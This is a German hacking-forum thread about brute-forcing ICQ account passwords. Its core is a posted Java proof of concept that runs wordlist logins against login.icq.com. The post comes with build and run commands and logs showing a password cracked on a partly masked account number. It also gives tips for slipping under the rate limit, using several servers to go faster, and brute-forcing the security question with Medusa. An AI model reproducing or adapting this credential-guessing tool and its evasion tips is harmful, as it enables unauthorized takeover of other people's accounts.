ICQ Nummer Bruteforcen...

**apels1n** · 04.04.2010, 19:26

Zitat von cr4x

-Das Passwort enthält sowohl Zahlen als auch Buchstaben und Sonderzeichen

kannst du die Nummer vergessen 1000%

**~~Slawa~~** · 04.04.2010, 19:54

Hi,

wie oben schon Mr. Greenie erwähnt hat, wird die IP nahc ein paar Versuche gebannt und man brächte eine Proxy Server Liste. Es gibt zwar Methoden, wie man unter Umständen auch 100% sichere Passwörter bruten kann, das kommt aber auf keinen Fall für einen Einsteiger in Frage.

Ich hoffe, dass ich dir da etwas helfen konnte.

Gruß

Slawa

**EBFE** · 04.04.2010, 20:20

wie oben schon Mr. Greenie erwähnt hat, wird die IP nahc ein paar Versuche gebannt und man brächte eine Proxy Server Liste

Geht ganz ohne Proxyliste - man muss nur zwischen Logins >4 Sekunden Zeit lassen und manchmal nach ~15 Versuchen reconnecten:

Proof Of Concept:
Java, verwendet JOscarLib_0.5.jar

Code:

import java.io.BufferedReader;
import java.io.FileReader;

import JOscarLib.Core.OscarConnection;

public class ICQLogin implements Thread.UncaughtExceptionHandler
{
    private boolean success=false;
    
    public static void main(String[] args)
    {
        if (args.length!=3)
        {
            System.out.println("Nutzung:\n"+
              "java -cp .;JOscarLib_0.5.jar ICQLogin ICQNum "+ 
                      "Sleeptime Passwordfile");
            return;
        }        
        ICQLogin login = new ICQLogin();
        Thread.setDefaultUncaughtExceptionHandler(login);
        
        try
        {
          BufferedReader input =  new BufferedReader(new FileReader(args[2]));  
            String pass;
          int icqnum=Integer.parseInt(args[0]);
          int sleeptime=Integer.parseInt(args[1])*1000;
          
          while(((pass=input.readLine())!=null)&&(!login.success))
          {
             login.connect(icqnum,pass,sleeptime);
          }
             
          System.out.println("Passwort: \n"+pass);
        }catch(Exception ex)
        {
            System.out.println("Fehler:\n"+ex);
        }
    
    }

    public boolean connect(int icqnum, String pass,int sleeptime)
    {
        OscarConnection con;
        try
        {   //die Lib gibt zuviele Statusmeldungen aus - unterdrücken
            System.setErr(new java.io.PrintStream(new java.io.OutputStream() 
            {public void write(int b){}}));
            success=true; //verquirktes Fehlerprinzip, aber keine Lust was anderes zu suchen
            System.out.println("versuche: " + icqnum + " " + pass);
            con = new OscarConnection("login.icq.com", 5190, Integer
                    .toString(icqnum), pass);
            Thread.sleep(sleeptime); // Abwarten, ob ein Login möglich ist
            con.close();
            return success;
        } catch (Exception ex)
        {
            System.out.println(ex.getMessage());
        }
        return false;
    }
    
    public void uncaughtException(Thread t, Throwable e)
    {
        System.out.println(e.getMessage());
        success=false;
    }
    

}

Makefile

Code:

javac -cp ../JOscarLib_0.5.jar ICQLogin.java

Run:
IcqNummer Pause_in_Sek Passwordfile

Code:

java -cp .;JOscarLib_0.5.jar ICQLogin 123456 5 mydic.txt

Bsp Log:

Code:

c:\ICQlogin\project>run 4841796xx 4 pass.txt
versuche: 4841796xx SennSe
Problem due to : Password incorrect.
versuche: 4841796xx SennS3
Problem due to : Password incorrect.
versuche: 4841796xx Sennse
Problem due to : Password incorrect.
versuche: 4841796xx Senns3
Problem due to : Rate limit exceeded. Please try to reconnect in a few minutes.

Wenn man im Abstand von 5 Sekunden versucht:

Code:

c:\ICQlogin\project>run 4841796xx 5 pass.txt
versuche: 4841796xx SennSe
Problem due to : Password incorrect.
versuche: 4841796xx SennS3
Problem due to : Password incorrect.
versuche: 4841796xx Sennse
Problem due to : Password incorrect.
versuche: 4841796xx Senns3
Problem due to : Password incorrect.
versuche: 4841796xx Senn$e
Problem due to : Password incorrect.
versuche: 4841796xx Senn$3
Problem due to : Password incorrect.
versuche: 4841796xx Sennºe
Problem due to : Password incorrect.
versuche: 4841796xx Sennº3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnSe
Problem due to : Password incorrect.
versuche: 4841796xx S3nnS3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnse
Problem due to : Password incorrect.
versuche: 4841796xx S3nns3
Problem due to : Password incorrect.
versuche: 4841796xx S3nn$e
Problem due to : Rate limit exceeded. Please try to reconnect in a few minute

Batchvorgang abbrechen (J/N)? n
Drücken Sie eine beliebige Taste . . .

ganz normaler reconnect

C:\ICQlogin\project>run 4841796xx 5 pass.txt
versuche: 4841796xx SennSe
Problem due to : Password incorrect.
versuche: 4841796xx SennS3
Problem due to : Password incorrect.
versuche: 4841796xx Sennse
Problem due to : Password incorrect.
versuche: 4841796xx Senns3
Problem due to : Password incorrect.
versuche: 4841796xx Senn$e
Problem due to : Password incorrect.
versuche: 4841796xx Senn$3
Problem due to : Password incorrect.
versuche: 4841796xx Sennºe
Problem due to : Password incorrect.
versuche: 4841796xx Sennº3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnSe
Problem due to : Password incorrect.
versuche: 4841796xx S3nnS3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnse
Problem due to : Password incorrect.
versuche: 4841796xx S3nns3
Problem due to : Password incorrect.
versuche: 4841796xx S3nn$e
Problem due to : Password incorrect.
versuche: 4841796xx S3nn$3
Problem due to : Password incorrect.
versuche: 4841796xx S3nnºe
Problem due to : Password incorrect.
versuche: 4841796xx S3nnº3
Problem due to : Password incorrect.
Passwort:
sexxxe
Drücken Sie eine beliebige Taste . . .

Das ist auf die Schnelle geschrieben und hat keine automatisches Reconnect (ja, ich bin faul

) - im Bsp Log oben habe ich allerdings direkt wieder mit ICQ Server verbunden und nicht etwa minutenlang abgewartet. Beim zweiten mal ging das sogar komplett durch ohne "Sperrung"

Zusätzlich sollte es mehrere ICQ Server geben - so dass man die "Brutegeschwindigkeit" von einem Rechner aus nochmal deutlich steigern kann (weil 60/5=12 Passwörter in der Minute doch etwas arg wenig sind

). Lohnt sich aber trotzdem nur für den Fall dass man nur mehrere tausend Passwörter ausprobieren muss.

**katharinablum** · 04.05.2010, 22:24

Zitat von max

machs doch ganz einfach die klick auf Pw vergessen beantworte sicherheitsfrage wenn du antwort drauf nimmer weißt dann klick auf : das ist nicht meine sicherheitsfrage (ka wie genau der text heißt) dann gib die e mail adresse an die du bei der icq registrieung angegeben hast ... dort wird dir dann das neue pw zugeschickt

hfgl
max

interessant wäre doch die frage, ob man die "sicherheitsfrage" bruteforcen könnte, z.B. mit einem medusa http-form web-modul ?!

**~~hanski4~~** · 07.06.2010, 16:51

Wenn du die nummer hast wird es reichen da du unter profil schauen kannst.

Thema: ICQ Nummer Bruteforcen...

Themen-Optionen

Anzeige

Folgende Benutzer haben sich für diesen Beitrag bedankt:

Stichworte

Berechtigungen